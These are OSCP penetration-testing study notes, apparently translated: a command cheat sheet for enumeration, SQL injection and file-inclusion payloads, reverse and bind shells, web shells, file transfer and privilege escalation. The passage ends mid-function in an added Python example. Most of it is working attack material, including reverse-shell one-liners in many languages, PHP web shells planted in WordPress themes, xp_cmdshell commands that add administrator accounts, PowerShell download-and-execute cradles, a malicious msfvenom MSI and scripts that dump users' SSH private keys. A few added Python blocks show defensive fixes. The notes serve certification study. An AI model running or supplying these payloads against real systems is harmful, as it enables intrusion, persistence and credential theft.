OSCP Study Notes
I. Reconnaissance and Enumeration
1. Logging the engagement
script target.log
2. Port scanning
(1) Nmap
nmap -sS -Pn -n -A x.x.x.x
Scan all UDP ports without retries (fast but lossy: a dropped probe shows up as open|filtered, so re-check interesting ports individually)
nmap -sU -p- --max-retries 0 --min-rate 500 x.x.x.x
(2) Nc
nc -nvv -w 1 -z x.x.x.x 1-100
(3) PowerShell
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Invoke-Portscan.ps1');Invoke-Portscan -Hosts x.x.x.x"
3. Host enumeration
(1) nikto -h x.x.x.x
(2) enum4linux x.x.x.x
(3) Detect whether the host is 32-bit or 64-bit
Link:
https://github.com/SecureAuthCorp/impacket/blob/master/examples/getArch.py
python getArch.py -target x.x.x.x
4. DNS zone transfer
dig axfr domain.com @nameserver
5. Web directory fuzzing
(1) Gobuster
apt-get install seclists
gobuster -u x.x.x.x -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 20
gobuster -u x.x.x.x -w /usr/share/seclists/Discovery/Web_Content/quickhits.txt -t 20
gobuster -u x.x.x.x -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 20 -x .txt,.php
(Gobuster 3.x moved directory brute-forcing into a subcommand: gobuster dir -u http://x.x.x.x -w <wordlist> -t 20 -x txt,php)
(2) Wfuzz
wfuzz -w /usr/share/seclists/Discovery/Web_Content/common.txt --hc 400,404,500 http://x.x.x.x/FUZZ
wfuzz -w /usr/share/seclists/Discovery/Web_Content/quickhits.txt --hc 400,404,500 http://x.x.x.x/FUZZ
6. SMB enumeration
smbmap -H x.x.x.x
smbclient -L x.x.x.x
nmap --script=smb-check-vulns.nse x.x.x.x
(smb-check-vulns was removed from current Nmap releases; use the smb-vuln-* scripts instead: nmap -p 445 --script smb-vuln-* x.x.x.x)
smbmount //x.x.x.x/share /mnt -o username=xxx,workgroup=xxx
mount -t cifs //x.x.x.x/share /mnt
mount -t cifs -o username=xxx,password=xxx //x.x.x.x/share /mnt
smbclient \\\\x.x.x.x\\share
Null session with rpcclient
rpcclient -U "" x.x.x.x
7. SNMP enumeration
Walk the tree with the default community string
snmpwalk -c public -v1 x.x.x.x
Kerberos user enumeration: discover valid usernames by forcing AS-REQ lookups against the KDC with a wordlist
nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='domain.local',userdb=/usr/share/wordlists/SecLists/Usernames/top_shortlist.txt x.x.x.x
https://nmap.org/nsedoc/scripts/krb5-enum-users.html
8. CMS
(1) cmsmap
cmsmap.py https://x.x.x.x
(2) wpscan
wpscan --url https://x.x.x.x
Password brute force
wpscan --url http://x.x.x.x --wordlist /usr/share/wordlists/SecLists/Passwords/best1050.txt --username admin --threads 10
(wpscan 3.x renamed these options: --passwords <wordlist> --usernames admin)
9. SQL injection
(1) Common test strings (one per line)
1' or '1'='1
1' or '1'='1'
1' or '1'='1'--
' or 1=1 --
a' or 1=1 --
" or 1=1 --
a" or 1=1 --
' or 1=1 #
" or 1=1 #
or 1=1 --
' or 'x'='x
" or "x"="x
') or ('x'='x
") or ("x"="x
(2) Find injectable parameters with time delays
MSSQL:
';WAITFOR DELAY '0:0:5'--
MySQL:
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
+BENCHMARK(40000000,SHA1(1337))+
'%2Bbenchmark(3200,SHA1(1))%2B'
(3) If the above works against MSSQL, try enabling xp_cmdshell (the injected user needs sysadmin rights on the instance)
EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
(4) Test xp_cmdshell with ping (watch for ICMP arriving on your host)
';exec master..xp_cmdshell 'ping -n 3 x.x.x.x'; --
(5) Add a local administrator via xp_cmdshell
';exec master..xp_cmdshell 'net user xxx Qwerty123! /ADD && net localgroup administrators xxx /ADD'; --
(6) Add the administrator to the RDP group as well
';exec master..xp_cmdshell 'net user xxx Qwerty123! /ADD && net localgroup administrators xxx /ADD && net localgroup "Remote Desktop Users" xxx /ADD'; --
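The bypass strings above work because the application concatenates the parameter into the SQL text, so the quote closes the string literal and the rest is parsed as SQL. The following is an added example (not part of the original notes) that replays those strings against a constructed SQLite database, side by side with the parameterised form of the same query; SQLite stands in for the MySQL/MSSQL back end, so the MySQL-only "#" comment shows up as a syntax error rather than a bypass, and the SLEEP()/WAITFOR probes are not reproduced.

```python
import sqlite3

# Added example (not part of the original notes): the login-bypass strings above,
# run against a constructed SQLite database so the effect can be seen offline.
# SQLite stands in for the MySQL/MSSQL back end, so the MySQL "#" comment and the
# SLEEP()/WAITFOR delay probes are not reproduced here.

def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    # Constructed row; the attacker is assumed not to know this password.
    db.execute("INSERT INTO users VALUES ('admin', 'correct horse battery staple')")
    return db

def vulnerable_login(db, username, password):
    """The broken pattern: user input is concatenated into the SQL text."""
    sql = ("SELECT COUNT(*) FROM users WHERE username='%s' AND password='%s'"
           % (username, password))
    return db.execute(sql).fetchone()[0] > 0

def safe_login(db, username, password):
    """The fix: the same query with bound parameters; input is never parsed as SQL."""
    sql = "SELECT COUNT(*) FROM users WHERE username=? AND password=?"
    return db.execute(sql, (username, password)).fetchone()[0] > 0

def probe(db, payloads, login=vulnerable_login):
    """Replay each payload in the password field and report which ones log in.
    A database error is recorded separately: it means the quote broke the
    query, which is itself evidence of injection even when the bypass fails."""
    bypassed, errors = [], []
    for p in payloads:
        try:
            if login(db, "admin", p):
                bypassed.append(p)
        except sqlite3.OperationalError:
            errors.append(p)
    return bypassed, errors

PAYLOADS = [
    "' or '1'='1",
    "' or 1=1 --",
    "' or 1=1 #",      # MySQL comment syntax; a syntax error in SQLite, not a bypass
    "' or 'x'='x",
    "Qwerty123!",      # a plain wrong password, for contrast
]

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", probe(db, PAYLOADS))
    print("parameterised:", probe(db, PAYLOADS, safe_login))
```

Three of the five strings log in against the concatenated query and none against the bound one; the "#" variant raises an error, which is the same signal you watch for on a real target when a single quote produces a 500 page.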
10. Local file inclusion (LFI)
(1) Basic checks
Linux
../../../../../../../../../../etc/passwd
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
../../../../../../../../../../etc/passwd%00
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%2500
Windows
../../../../../../../../../../boot.ini
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini
../../../../../../../../../../boot.ini%00
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%2500
../../../../../../../../../../windows/system32/drivers/etc/hosts
../../../../../../../../../../windows/system32/drivers/etc/hosts%00
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/system32/drivers/etc/hosts
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/system32/drivers/etc/hosts%2500
(The %00 variants rely on null-byte truncation of the path, which PHP removed in 5.3.4; boot.ini only exists on Windows XP/2003 and earlier.)
https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI
(2) LFI exploitation
<1> expect:// (only when the expect extension is loaded)
http://x.x.x.x/blah?parameter=expect://whoami
<2> data:// (requires allow_url_include=On)
http://x.x.x.x/blah?parameter=data://text/plain;base64,PD8gcGhwaW5mbygpOyA/Pg==
(the base64 payload decodes to: <? phpinfo(); ?>)
<3> php://input (requires allow_url_include=On)
http://x.x.x.x/blah?parameter=php://input
POST body (e.g. via Hackbar): <? phpinfo(); ?>
11. Remote file inclusion (RFI)
GET /supersecret/admin.php?path=http://x.x.x.x/phpinfo.php%00
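The encoded and null-terminated variants above exist to get past filters that look at the raw parameter. The block below is an added example (not from the original notes) that runs those exact strings through a naive "no ../ in the input" filter and through a containment check that decodes first, rejects NUL bytes and resolves the path against the web root; it also rebuilds the data:// payload from its PHP source so the base64 above can be verified. The web root is a constructed temporary directory, so it runs offline.

```python
import base64
import os
import tempfile
from urllib.parse import unquote

# Added example (not from the original notes): the traversal strings above run
# against a naive filter and against a proper containment check, plus the
# data:// wrapper payload rebuilt from its PHP source. The web root is a
# constructed temporary directory so this runs offline.

PAYLOADS = [
    "../../../../../../../../../../etc/passwd",
    "..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd",
    "../../../../../../../../../../etc/passwd%00",
    "..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%2500",
]

def naive_filter_allows(requested):
    """The kind of check the encoded variants are written to defeat: it looks for
    a literal '../' in the raw parameter and never URL-decodes it."""
    return "../" not in requested

def resolve_inside(base_dir, requested):
    """Decode (twice, to cover %2500 -> %00), refuse NUL bytes, then resolve the
    path and require it to stay under base_dir. Returns the path or None."""
    decoded = unquote(unquote(requested))
    if "\x00" in decoded:
        return None            # NUL truncation only fools C-string APIs; reject it outright
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, decoded.lstrip("/\\")))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate

def data_wrapper(php_source):
    """data:// wrapper as used above; base64 keeps quotes and spaces out of the URL."""
    b64 = base64.b64encode(php_source.encode()).decode()
    return "data://text/plain;base64," + b64

def demo():
    """Run every payload through both checks on a constructed web root."""
    root = tempfile.mkdtemp()
    with open(os.path.join(root, "index.php"), "w") as f:
        f.write("<?php echo 'hello'; ?>")
    results = {}
    for p in PAYLOADS + ["index.php"]:
        results[p] = (naive_filter_allows(p), resolve_inside(root, p) is not None)
    return results

if __name__ == "__main__":
    for p, (naive, strict) in demo().items():
        print("%-70s naive_allows=%-5s strict_allows=%s" % (p, naive, strict))
    print(data_wrapper("<? phpinfo(); ?>"))
```

The naive filter lets both %2f-encoded strings through while the containment check rejects all four and still serves index.php; that is the difference between a filter and an actual boundary.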
12. Files and filesystem
Static filesystem table (mounts)
cat /etc/fstab
Find writable directories
Find writable files
Find writable configuration files
find /etc/ -writable -type f 2>/dev/null
II. Getting a Shell
1. Shells
(1) Reverse shells
Bash
bash -i >& /dev/tcp/x.x.x.x/4444 0>&1
/bin/bash -i > /dev/tcp/x.x.x.x/4444 0<&1 2>&1
/bin/sh -i > /dev/tcp/x.x.x.x/4444 0<&1 2>&1
Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Perl
perl -e 'use Socket;$i="x.x.x.x";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Perl (Windows)
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"x.x.x.x:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
PHP
php -r '$sock=fsockopen("x.x.x.x",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
(the "3" assumes the socket is the first descriptor opened after stdin/stdout/stderr; if it fails, try 4, 5, 6)
Ruby
ruby -rsocket -e'f=TCPSocket.open("x.x.x.x",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Netcat
nc -e /bin/sh x.x.x.x 4444
nc -e cmd.exe x.x.x.x 4444
/bin/sh | nc x.x.x.x 4444
rm -f /tmp/p; mknod /tmp/p p && nc x.x.x.x 4444 0</tmp/p | /bin/sh 1>/tmp/p
(the named-pipe form is for netcat builds without -e)
Telnet
rm -f /tmp/p; mknod /tmp/p p && telnet x.x.x.x 4444 0</tmp/p | /bin/sh 1>/tmp/p
telnet x.x.x.x 80 | /bin/bash | telnet x.x.x.x 443
(second form: run listeners on both 80 and 443; type commands into the first, read output on the second)
Java (Groovy syntax)
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/x.x.x.x/4444;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
Shellshock reverse shell
Test for the vulnerability via the User-Agent header
() { :; }; /bin/bash -c 'whoami'
Reverse shell
() { :; }; /bin/bash -c 'bash -i >& /dev/tcp/x.x.x.x/4444 0>&1;'
PowerShell
Invoke-PowerShellTcp
https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
Append at the bottom of the script
Invoke-PowerShellTcp -Reverse -IPAddress x.x.x.x -Port 4444
C
// gcc reverse.c -o reverse
#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <arpa/inet.h>

int main(int argc, char **argv)
{
    int scktd;
    struct sockaddr_in client;

    client.sin_family = AF_INET;
    client.sin_addr.s_addr = inet_addr("x.x.x.x"); // attacker IP
    client.sin_port = htons(4444);                 // attacker port

    scktd = socket(AF_INET, SOCK_STREAM, 0);
    connect(scktd, (struct sockaddr *)&client, sizeof(client));

    dup2(scktd, 0); // STDIN
    dup2(scktd, 1); // STDOUT
    dup2(scktd, 2); // STDERR

    execl("/bin/sh", "sh", "-i", NULL);
    return 0;
}
(2) Bind shells
C
// gcc bind.c -o bind
#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <arpa/inet.h>

int main(int argc, char **argv)
{
    int scktd = -1;
    int scktd_client = -1;
    int i = -1;
    struct sockaddr_in server;
    struct sockaddr_in client;

    scktd = socket(AF_INET, SOCK_STREAM, 0);
    if (scktd == -1)
        return -1;

    server.sin_family = AF_INET;
    server.sin_addr.s_addr = INADDR_ANY;
    server.sin_port = htons(4444); // local listening port

    if (bind(scktd, (struct sockaddr *)&server, sizeof(server)) < 0)
        return -2;

    listen(scktd, 3);
    i = sizeof(struct sockaddr_in);
    scktd_client = accept(scktd, (struct sockaddr *)&client, (socklen_t *)&i);
    if (scktd_client < 0)
        return -3;

    dup2(scktd_client, 0); // STDIN
    dup2(scktd_client, 1); // STDOUT
    dup2(scktd_client, 2); // STDERR

    execl("/bin/sh", "sh", "-i", NULL);
    return 0;
}
(3) Web shells
PHP
<1> WordPress
Edit the theme's 404.php in WordPress, drop the code in, then call it:
http://x.x.x.x/404.php?cmd=id
http://x.x.x.x/404.php?cmd=nc x.x.x.x 4444 -e /bin/sh
Code
<?php echo shell_exec($_GET['cmd']); ?>
<? passthru($_GET["cmd"]); ?>
<?php echo shell_exec($_GET["cmd"]); ?>
<2> phpMyAdmin
<?php system("/usr/local/bin/wget http://x.x.x.x:4444/php-reverse-shell.php -O /var/tmp/hodor.php 2>&1"); ?>
<3> SQL query (needs the MySQL FILE privilege and a writable web root)
SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "C:\\xampp\\htdocs\\shell.php"
LFI reverse shell
http://x.x.x.x/blah?parameter=/etc/passwd%00
<1> POST request URL
http://x.x.x.x/blah?parameter=php://input%00
<2> POST data
<? phpinfo(); ?>
<3> POST data: reverse shell over port 443
<?php echo shell_exec("bash -i >& /dev/tcp/x.x.x.x/443 0>&1 2>&1"); ?>
HTTP methods
<1> HTTP POST
curl -X POST -F "file=@/location/shell.php" http://x.x.x.x/upload.php --cookie "cookie"
<2> HTTP PUT
curl -X PUT -d '<?php system($_GET["c"]);?>' http://x.x.x.x/shell.php
(4) Local (SUID wrapper: only yields root when the binary is owned by root with the SUID bit set, or is executed by a root process such as a cron job)
// gcc -o wrapper wrapper.c
#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>

int main(void)
{
    setresuid(0, 0, 0);
    system("/bin/bash");
    return 0;
}
2. File transfer
Python HTTP server
python -m SimpleHTTPServer (default port 8000)
python -m SimpleHTTPServer 8001
Python 3 equivalent: python3 -m http.server 8001
wget https://gist.githubusercontent.com/UniIsland/3346170/raw/059aca1d510c615df3d9fedafabac4d538ebe352/SimpleHTTPServerWithUpload.py ; chmod +x SimpleHTTPServerWithUpload.py; ./SimpleHTTPServerWithUpload.py
(1) Windows
<1> PowerShell
(New-Object System.Net.WebClient).DownloadFile("http://x.x.x.x:4444/file", "C:\Users\hodor\file")
PS C:\> IEX(New-Object Net.WebClient).downloadString('http://x.x.x.x/Invoke-MS16032.ps1')
Download and run a remote script (the SysNative path reaches 64-bit PowerShell from a 32-bit process)
C:\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX(New-Object Net.WebClient).downloadString('http://x.x.x.x:8000/Invoke-PowerShellTcp.ps1')
<2> FTP
Method 1:
Configure FTP on Kali (pure-ftpd)
#!/bin/bash
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pw useradd hodor -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart
Start the Kali FTP server
# FTP home dir = /ftphome/
/etc/init.d/pure-ftpd start
Download nc on the target with a non-interactive ftp script
echo open x.x.x.x 21 > test.txt
echo USER hodor>> test.txt
echo hodor>> test.txt
echo bin >> test.txt
echo GET nc.exe >> test.txt
echo bye >> test.txt
ftp -v -n -s:test.txt
(keep the space before the first ">": cmd.exe otherwise reads "21>" as "2" followed by the handle-1 redirection "1>", and the port ends up as "2" in the file)
Method 2
apt-get install python-pyftpdlib
python -m pyftpdlib -p 21
ftp x.x.x.x
get nc.exe
nc.exe -nv x.x.x.x 4444 -e cmd.exe
C:\Inetpub\wwwroot\nc.exe -e cmd.exe x.x.x.x 4444
<3> RDP
Mount a local folder as a share over RDP
rdesktop x.x.x.x -r disk:share=/home/user/foldertoshare
<4> VBScript
Code (writes wget.vbs with echo, one line per command)
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
Run
cscript wget.vbs http://x.x.x.x/file.exe file.exe
(2) Linux
<1> Wget
wget http://x.x.x.x/blah.txt
wget http://x.x.x.x/blah.txt -O blah.txt
<2> Netcat
Target
nc -lvp 4444 > blah.txt
Attacker
Method 1
nc x.x.x.x 4444 < blah.txt
Method 2
cat blah.txt | nc x.x.x.x 4444
<3> Python (2.x)
python -c "import urllib; print urllib.urlopen('http://x.x.x.x:8000/ms11-080.py').read()" > ms11-080.py
III. Privilege Escalation
1. Windows
(1) Windows version
<1> Client
<2> Server
(2) Users
Current user
whoami
echo %username%
Which privileges does the user hold
whoami /priv
List users
net users
Check for administrator rights
net localgroup administrators
Stored credentials
cmdkey /list
Currently cached Kerberos tickets (may also reveal other network components)
klist
Are other users logged in
qwinsta
(3) Passwords
Password hashes
/usr/share/windows-binaries/fgdump/fgdump.exe
C:\> fgdump.exe
C:\> type 127.0.0.1.pwdump
fgdump link
FGDump - aldeid
In a domain, search the Group Policy Preferences XML in SYSVOL for "cpassword":
findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
(4) Finding passwords
dir /s *password*
findstr /si password *.ini *.xml *.txt
findstr /spin "password" *.*
Common files
type c:\sysprep.inf
type c:\sysprep\sysprep.xml
type c:\unattend.xml
type %WINDIR%\Panther\Unattend\Unattended.xml
type %WINDIR%\Panther\Unattended.xml
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul
dir c:\*vnc.ini /s /b
dir c:\*ultravnc.ini /s /b
dir c:\ /s /b | findstr /si *vnc.ini
%windir%\repair\sam
%windir%\System32\config\RegBack\SAM
%windir%\repair\system
%windir%\repair\software
%windir%\repair\security
%windir%\debug\NetSetup.log (AD domain name, DC name, internal IP, DA account)
%windir%\iis6.log (IIS 5, 6 or 7)
%windir%\system32\logfiles\httperr\httperr1.log
C:\sysprep.inf
C:\sysprep\sysprep.inf
C:\sysprep\sysprep.xml
%windir%\Panther\Unattended.xml
C:\inetpub\wwwroot\Web.config
%windir%\system32\config\AppEvent.Evt (Application log)
%windir%\system32\config\SecEvent.Evt (Security log)
%windir%\system32\config\default.sav
%windir%\system32\config\security.sav
%windir%\system32\config\software.sav
%windir%\system32\config\system.sav
%windir%\system32\inetsrv\config\applicationHost.config
%windir%\system32\inetsrv\config\schema\ASPNET_schema.xml
%windir%\System32\drivers\etc\hosts (DNS entries)
%windir%\System32\drivers\etc\networks (network settings)
%windir%\system32\config\SAM (only really useful if you can read the file while the machine is offline; it is locked while Windows runs)
(5) AlwaysInstallElevated
Check whether the registry value is 1 (both the HKCU and the HKLM key must be set for it to work)
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
If both are 1, run a malicious MSI that adds a local user
msfvenom -p windows/adduser USER=hodor PASS=Qwerty123! -f msi -o hodor.msi
msiexec /quiet /qn /i C:\hodor.msi
(6) Weak service permissions (upnphost example)
sc qc upnphost
sc config upnphost binpath= "C:\nc.exe -nv x.x.x.x 4444 -e C:\WINDOWS\System32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost
net start upnphost
If it fails on a missing dependency:
sc config SSDPSRV start= auto
net start SSDPSRV
net start upnphost
Or remove the dependency altogether
sc config upnphost depend= ""
(7) Scheduled tasks
List scheduled tasks
schtasks /query /fo LIST /v
Running processes mapped to their services
tasklist /SVC
(8) PowerShell tools
<1> PowerUp.ps1
Checks the common Windows privilege escalation vectors
PowerTools/PowerUp.ps1 at master · PowerShellEmpire/PowerTools · GitHub
Download on the target
IEX(New-Object Net.Webclient).downloadString('http://x.x.x.x:8000/PowerUp.ps1')
Append at the bottom of the script
Invoke-AllChecks
Run
powershell.exe -nop -exec bypass
PS C:\> Import-Module .\PowerUp.ps1
PS C:\> Invoke-AllChecks
<2> Sherlock.ps1
Sherlock/Sherlock.ps1 at master · rasta-mouse/Sherlock · GitHub
IEX(New-Object Net.Webclient).downloadString('http://x.x.x.x:8000/Sherlock.ps1')
Append at the bottom of the script
Find-AllVulns
Run
powershell.exe -nop -exec bypass
PS C:\> Import-Module .\Sherlock.ps1
PS C:\> Find-AllVulns
<3> Nishang
GitHub - samratashok/nishang: Nishang - Offensive PowerShell for red team, penetration testing and offensive security.
(9) Compiling
Compile an exe on Linux
i686-w64-mingw32-gcc 18176.c -lws2_32 -o 18176.exe
Compile a Python script into an executable
wine ~/.wine/drive_c/Python27/Scripts/pyinstaller.exe --onefile exploit.py
(10) Windows exploits
<1> Remote
ms03-026
ms03-039 (1)
ms03-039 (2)
ms03-049
ms04-007
ms04-011 - ssl bof
ms04-011 - lsasarv.dll
ms04-031
ms05-017
ms05-039
ms06-040 (1)
ms06-040 (2)
ms06-070
ms08-067 (1)
ms08-067 (2)
ms08-067 (3)
ms09-050
<2> Local
ms04-011
ms04-019 (1)
ms04-019 (2)
ms04-019 (3)
ms04-020
keybd_event
ms05-018
ms05-055
ms06-030
ms06-049
print spool service
ms08-025
netdde
ms10-015
ms10-059
ms10-092
ms11-080
ms14-040
ms14-058 (1)
ms14-058 (2)
ms14-070 (1)
ms14-070 (2)
ms15-010 (1)
ms15-010 (2)
ms15-051
ms16-014
ms16-016
ms16-032
Links:
Exploit Database - Exploits for Penetration Testers, Researchers, and Ethical Hackers
GitHub - abatchy17/WindowsExploits: Windows exploits, mostly precompiled. Not being updated. Check https://github.com/SecWiki/windows-kernel-exploits instead.
https://github.com/SecWiki/windows-kernel-exploits
2. Linux
(1) Sudo
cat /etc/sudoers
sudo -l
Becoming a superhero:
root can run any command as any user from any terminal.
root ALL=(ALL) ALL
User john can run poweroff from any terminal, authenticating with john's own password.
john ALL= /sbin/poweroff
User john can run scp as root from any terminal without a password.
john ALL = (root) NOPASSWD: /usr/bin/scp
(2) Distribution and kernel version
cat /etc/*release*
uname -a
rpm -q kernel
dmesg | grep -i linux
(3) Directories writable by default
/tmp
/dev/shm
(4) Finding passwords
Search config.php for passwords
grep -R 'password' config.php
Search the whole system
find / -type f -exec grep -H 'password' {} \; 2>/dev/null
grep -R -i "password" 2> >(grep -v 'Permission denied' >&2)
grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n 'var $password'
(single quotes matter here: inside double quotes the shell would expand $password to nothing)
(5) Other potentially writable directories/files
(6) Services running as root
ps aux | grep root
ps -ef | grep root
(7) Installed applications
ls -lah /usr/bin/
ls -lah /sbin/
dpkg -l
rpm -qa
ls -lah /var/cache/apt/archives/
ls -lah /var/cache/yum/
(8) Scheduled jobs
crontab -l
ls -la /etc/cron*
ls -lah /var/spool/cron
ls -la /etc/ | grep cron
cat /etc/crontab
cat /etc/anacrontab
(9) Other methods
<1> Searching in files
grep -rnw '/etc/passwd' -e 'root'
<2> SSH
authorized_keys: public keys of the authorized clients, i.e. the SSH keys that may log in to the account whose home directory holds the file; the server uses it to authenticate users.
id_rsa: the client's private key. This RSA key works with SSH protocol 1 or 2.
id_rsa.pub: the client's public key.
id_dsa: the client's private key. This (insecure) DSA key works with SSH protocol 2 only.
id_dsa.pub: the client's public key.
known_hosts: host keys of the servers the client has connected to.
<3> Find RSA private keys
#!/bin/bash
for X in $(cut -f6 -d ':' /etc/passwd | sort | uniq); do
    if [ -s "${X}/.ssh/id_rsa" ]; then
        echo "### ${X}: "
        cat "${X}/.ssh/id_rsa"
        echo ""
    fi
done
<4> Find DSA private keys
#!/bin/bash
for X in $(cut -f6 -d ':' /etc/passwd | sort | uniq); do
    if [ -s "${X}/.ssh/id_dsa" ]; then
        echo "### ${X}: "
        cat "${X}/.ssh/id_dsa"
        echo ""
    fi
done
<5> Sticky bit, SGID, SUID
Sticky bit:
find / -perm -1000 -type d 2>/dev/null
SGID (chmod 2000):
find / -perm -g=s -type f 2>/dev/null
SUID (chmod 4000):
find / -perm -u=s -type f 2>/dev/null
find /* -user root -perm -4000 -print 2>/dev/null
SUID or SGID (the parentheses are needed, otherwise -type f only applies to the SUID branch)
find / \( -perm -g=s -o -perm -u=s \) -type f 2>/dev/null
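The find(1) one-liners above (and the writable-file searches under "12. Files and filesystem") test mode bits, so it is worth seeing the same rules spelled out. The block below is an added example (not part of the original notes) that re-implements those checks in Python, together with a small parser that reduces sudoers rules of the form shown under (1) Sudo to user, run-as target, NOPASSWD flag and command list. It builds a constructed directory tree (a SUID "ping", a sticky world-writable tmp, a world-writable config file), so it can be run offline by an unprivileged user; point the functions at "/" to use them on a real box.

```python
import os
import stat
import tempfile

# Added example (not part of the original notes): the find(1) one-liners above
# re-implemented so the matching rules are explicit, plus a parser for the
# sudoers rules shown under (1). It runs against a constructed directory tree,
# so it can be tried offline as an unprivileged user.

def walk_entries(root):
    """Yield (path, lstat) for everything below root, skipping unreadable entries
    (the equivalent of the shell version's 2>/dev/null)."""
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            try:
                yield path, os.lstat(path)
            except OSError:
                continue

def find_special_bits(root):
    """find / -perm -u=s -type f ; find / -perm -g=s -type f ; find / -perm -1000 -type d"""
    found = {"suid": [], "sgid": [], "sticky_dirs": []}
    for path, st in walk_entries(root):
        mode = st.st_mode
        if stat.S_ISREG(mode) and mode & stat.S_ISUID:
            found["suid"].append(path)
        if stat.S_ISREG(mode) and mode & stat.S_ISGID:
            found["sgid"].append(path)
        if stat.S_ISDIR(mode) and mode & stat.S_ISVTX:
            found["sticky_dirs"].append(path)
    return found

def find_world_writable(root):
    """Files and directories with the o+w bit. Unlike 'find -writable' the result
    does not depend on which user runs the check."""
    return sorted(path for path, st in walk_entries(root)
                  if (stat.S_ISREG(st.st_mode) or stat.S_ISDIR(st.st_mode))
                  and st.st_mode & stat.S_IWOTH)

def parse_sudoers(text):
    """Reduce 'user HOST=(runas) [NOPASSWD:] cmds' lines to
    (user, runas, nopasswd, cmds). Defaults, aliases and %group lines are skipped."""
    rules = []
    skip_prefixes = ("Defaults", "%", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias")
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line or line.startswith(skip_prefixes) or "=" not in line:
            continue
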